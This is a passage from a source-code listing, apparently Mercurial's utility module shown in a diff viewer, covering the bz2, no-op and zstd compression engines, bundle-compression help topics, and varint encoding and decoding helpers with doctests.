3654 3655 # We declare a protocol name but don't advertise by default because
3655 3656 # it is slow.
3656 3657 def wireprotosupport(self):
3657 3658 return compewireprotosupport('bzip2', 0, 0)
3658 3659
3659 3660 def compressstream(self, it, opts=None):
3660 3661 opts = opts or {}
3661 3662 z = bz2.BZ2Compressor(opts.get('level', 9))
3662 3663 for chunk in it:
3663 3664 data = z.compress(chunk)
3664 3665 if data:
3665 3666 yield data
3666 3667
3667 3668 yield z.flush()
3668 3669
3669 3670 def decompressorreader(self, fh):
3670 3671 return _BZ2CompressedStreamReader(fh)
3671 3672
3672 3673 compengines.register(_bz2engine())
3673 3674
3674 3675 class _truncatedbz2engine(compressionengine):
3675 3676 def name(self):
3676 3677 return 'bz2truncated'
3677 3678
3678 3679 def bundletype(self):
3679 3680 return None, '_truncatedBZ'
3680 3681
3681 3682 # We don't implement compressstream because it is hackily handled elsewhere.
3682 3683
3683 3684 def decompressorreader(self, fh):
3684 3685 return _TruncatedBZ2CompressedStreamReader(fh)
3685 3686
3686 3687 compengines.register(_truncatedbz2engine())
3687 3688
3688 3689 class _noopengine(compressionengine):
3689 3690 def name(self):
3690 3691 return 'none'
3691 3692
3692 3693 def bundletype(self):
3693 3694 """No compression is performed.
3694 3695
3695 3696 Use this compression engine to explicitly disable compression.
3696 3697 """
3697 3698 return 'none', 'UN'
3698 3699
3699 3700 # Clients always support uncompressed payloads. Servers don't because
3700 3701 # unless you are on a fast network, uncompressed payloads can easily
3701 3702 # saturate your network pipe.
3702 3703 def wireprotosupport(self):
3703 3704 return compewireprotosupport('none', 0, 10)
3704 3705
3705 3706 # We don't implement revlogheader because it is handled specially
3706 3707 # in the revlog class.
3707 3708
3708 3709 def compressstream(self, it, opts=None):
3709 3710 return it
3710 3711
3711 3712 def decompressorreader(self, fh):
3712 3713 return fh
3713 3714
3714 3715 class nooprevlogcompressor(object):
3715 3716 def compress(self, data):
3716 3717 return None
3717 3718
3718 3719 def revlogcompressor(self, opts=None):
3719 3720 return self.nooprevlogcompressor()
3720 3721
3721 3722 compengines.register(_noopengine())
3722 3723
3723 3724 class _zstdengine(compressionengine):
3724 3725 def name(self):
3725 3726 return 'zstd'
3726 3727
3727 3728 @propertycache
3728 3729 def _module(self):
3729 3730 # Not all installs have the zstd module available. So defer importing
3730 3731 # until first access.
3731 3732 try:
3732 3733 from . import zstd
3733 3734 # Force delayed import.
3734 3735 zstd.__version__
3735 3736 return zstd
3736 3737 except ImportError:
3737 3738 return None
3738 3739
3739 3740 def available(self):
3740 3741 return bool(self._module)
3741 3742
3742 3743 def bundletype(self):
3743 3744 """A modern compression algorithm that is fast and highly flexible.
3744 3745
3745 3746 Only supported by Mercurial 4.1 and newer clients.
3746 3747
3747 3748 With the default settings, zstd compression is both faster and yields
3748 3749 better compression than ``gzip``. It also frequently yields better
3749 3750 compression than ``bzip2`` while operating at much higher speeds.
3750 3751
3751 3752 If this engine is available and backwards compatibility is not a
3752 3753 concern, it is likely the best available engine.
3753 3754 """
3754 3755 return 'zstd', 'ZS'
3755 3756
3756 3757 def wireprotosupport(self):
3757 3758 return compewireprotosupport('zstd', 50, 50)
3758 3759
3759 3760 def revlogheader(self):
3760 3761 return '\x28'
3761 3762
3762 3763 def compressstream(self, it, opts=None):
3763 3764 opts = opts or {}
3764 3765 # zstd level 3 is almost always significantly faster than zlib
3765 3766 # while providing no worse compression. It strikes a good balance
3766 3767 # between speed and compression.
3767 3768 level = opts.get('level', 3)
3768 3769
3769 3770 zstd = self._module
3770 3771 z = zstd.ZstdCompressor(level=level).compressobj()
3771 3772 for chunk in it:
3772 3773 data = z.compress(chunk)
3773 3774 if data:
3774 3775 yield data
3775 3776
3776 3777 yield z.flush()
3777 3778
3778 3779 def decompressorreader(self, fh):
3779 3780 return _ZstdCompressedStreamReader(fh, self._module)
3780 3781
3781 3782 class zstdrevlogcompressor(object):
3782 3783 def __init__(self, zstd, level=3):
3783 3784 # TODO consider omitting frame magic to save 4 bytes.
3784 3785 # This writes content sizes into the frame header. That is
3785 3786 # extra storage. But it allows a correct size memory allocation
3786 3787 # to hold the result.
3787 3788 self._cctx = zstd.ZstdCompressor(level=level)
3788 3789 self._dctx = zstd.ZstdDecompressor()
3789 3790 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3790 3791 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3791 3792
3792 3793 def compress(self, data):
3793 3794 insize = len(data)
3794 3795 # Caller handles empty input case.
3795 3796 assert insize > 0
3796 3797
3797 3798 if insize < 50:
3798 3799 return None
3799 3800
3800 3801 elif insize <= 1000000:
3801 3802 compressed = self._cctx.compress(data)
3802 3803 if len(compressed) < insize:
3803 3804 return compressed
3804 3805 return None
3805 3806 else:
3806 3807 z = self._cctx.compressobj()
3807 3808 chunks = []
3808 3809 pos = 0
3809 3810 while pos < insize:
3810 3811 pos2 = pos + self._compinsize
3811 3812 chunk = z.compress(data[pos:pos2])
3812 3813 if chunk:
3813 3814 chunks.append(chunk)
3814 3815 pos = pos2
3815 3816 chunks.append(z.flush())
3816 3817
3817 3818 if sum(map(len, chunks)) < insize:
3818 3819 return ''.join(chunks)
3819 3820 return None
3820 3821
3821 3822 def decompress(self, data):
3822 3823 insize = len(data)
3823 3824
3824 3825 try:
3825 3826 # This was measured to be faster than other streaming
3826 3827 # decompressors.
3827 3828 dobj = self._dctx.decompressobj()
3828 3829 chunks = []
3829 3830 pos = 0
3830 3831 while pos < insize:
3831 3832 pos2 = pos + self._decompinsize
3832 3833 chunk = dobj.decompress(data[pos:pos2])
3833 3834 if chunk:
3834 3835 chunks.append(chunk)
3835 3836 pos = pos2
3836 3837 # Frame should be exhausted, so no finish() API.
3837 3838
3838 3839 return ''.join(chunks)
3839 3840 except Exception as e:
3840 3841 raise error.StorageError(_('revlog decompress error: %s') %
3841 3842 stringutil.forcebytestr(e))
3842 3843
3843 3844 def revlogcompressor(self, opts=None):
3844 3845 opts = opts or {}
3845 3846 return self.zstdrevlogcompressor(self._module,
3846 3847 level=opts.get('level', 3))
3847 3848
3848 3849 compengines.register(_zstdengine())
3849 3850
3850 3851 def bundlecompressiontopics():
3851 3852 """Obtains a list of available bundle compressions for use in help."""
3852 3853 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3853 3854 items = {}
3854 3855
3855 3856 # We need to format the docstring. So use a dummy object/type to hold it
3856 3857 # rather than mutating the original.
3857 3858 class docobject(object):
3858 3859 pass
3859 3860
3860 3861 for name in compengines:
3861 3862 engine = compengines[name]
3862 3863
3863 3864 if not engine.available():
3864 3865 continue
3865 3866
3866 3867 bt = engine.bundletype()
3867 3868 if not bt or not bt[0]:
3868 3869 continue
3869 3870
3870 3871 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3871 3872
3872 3873 value = docobject()
3873 3874 value.__doc__ = pycompat.sysstr(doc)
3874 3875 value._origdoc = engine.bundletype.__doc__
3875 3876 value._origfunc = engine.bundletype
3876 3877
3877 3878 items[bt[0]] = value
3878 3879
3879 3880 return items
3880 3881
3881 3882 i18nfunctions = bundlecompressiontopics().values()
3882 3883
3883 3884 # convenient shortcut
3884 3885 dst = debugstacktrace
3885 3886
3886 3887 def safename(f, tag, ctx, others=None):
3887 3888 """
3888 3889 Generate a name that it is safe to rename f to in the given context.
3889 3890
3890 3891 f: filename to rename
3891 3892 tag: a string tag that will be included in the new name
3892 3893 ctx: a context, in which the new name must not exist
3893 3894 others: a set of other filenames that the new name must not be in
3894 3895
3895 3896 Returns a file name of the form oldname~tag[~number] which does not exist
3896 3897 in the provided context and is not in the set of other names.
3897 3898 """
3898 3899 if others is None:
3899 3900 others = set()
3900 3901
3901 3902 fn = '%s~%s' % (f, tag)
3902 3903 if fn not in ctx and fn not in others:
3903 3904 return fn
3904 3905 for n in itertools.count(1):
3905 3906 fn = '%s~%s~%s' % (f, tag, n)
3906 3907 if fn not in ctx and fn not in others:
3907 3908 return fn
3908 3909
3909 3910 def readexactly(stream, n):
3910 3911 '''read n bytes from stream.read and abort if less was available'''
3911 3912 s = stream.read(n)
3912 3913 if len(s) < n:
3913 3914 raise error.Abort(_("stream ended unexpectedly"
3914 3915 " (got %d bytes, expected %d)")
3915 3916 % (len(s), n))
3916 3917 return s
3917 3918
3918 3919 def uvarintencode(value):
3919 3920 """Encode an unsigned integer value to a varint.
3920 3921
3921 3922 A varint is a variable length integer of 1 or more bytes. Each byte
3922 3923 except the last has the most significant bit set. The lower 7 bits of
3923 3924 each byte store the 2's complement representation, least significant group
3924 3925 first.
3925 3926
3926 3927 >>> uvarintencode(0)
3927 3928 '\\x00'
3928 3929 >>> uvarintencode(1)
3929 3930 '\\x01'
3930 3931 >>> uvarintencode(127)
3931 3932 '\\x7f'
3932 3933 >>> uvarintencode(1337)
3933 3934 '\\xb9\\n'
3934 3935 >>> uvarintencode(65536)
3935 3936 '\\x80\\x80\\x04'
3936 3937 >>> uvarintencode(-1)
3937 3938 Traceback (most recent call last):
3938 3939 ...
3939 3940 ProgrammingError: negative value for uvarint: -1
3940 3941 """
3941 3942 if value < 0:
3942 3943 raise error.ProgrammingError('negative value for uvarint: %d'
3943 3944 % value)
3944 3945 bits = value & 0x7f
3945 3946 value >>= 7
3946 3947 bytes = []
3947 3948 while value:
3948 3949 bytes.append(pycompat.bytechr(0x80 | bits))
3949 3950 bits = value & 0x7f
3950 3951 value >>= 7
3951 3952 bytes.append(pycompat.bytechr(bits))
3952 3953
3953 3954 return ''.join(bytes)
3954 3955
3955 3956 def uvarintdecodestream(fh):
3956 3957 """Decode an unsigned variable length integer from a stream.
3957 3958
3958 3959 The passed argument is anything that has a ``.read(N)`` method.
3959 3960
3960 3961 >>> try:
3961 3962 ... from StringIO import StringIO as BytesIO
3962 3963 ... except ImportError:
3963 3964 ... from io import BytesIO
3964 3965 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3965 3966 0
3966 3967 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3967 3968 1
3968 3969 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3969 3970 127
3970 3971 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3971 3972 1337
3972 3973 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3973 3974 65536
3974 3975 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3975 3976 Traceback (most recent call last):
3976 3977 ...
3977 3978 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3978 3979 """
3979 3980 result = 0
3980 3981 shift = 0
3981 3982 while True:
3982 3983 byte = ord(readexactly(fh, 1))
3983 3984 result |= ((byte & 0x7f) << shift)
3984 3985 if not (byte & 0x80):
3985 3986 return result
3986 3987 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now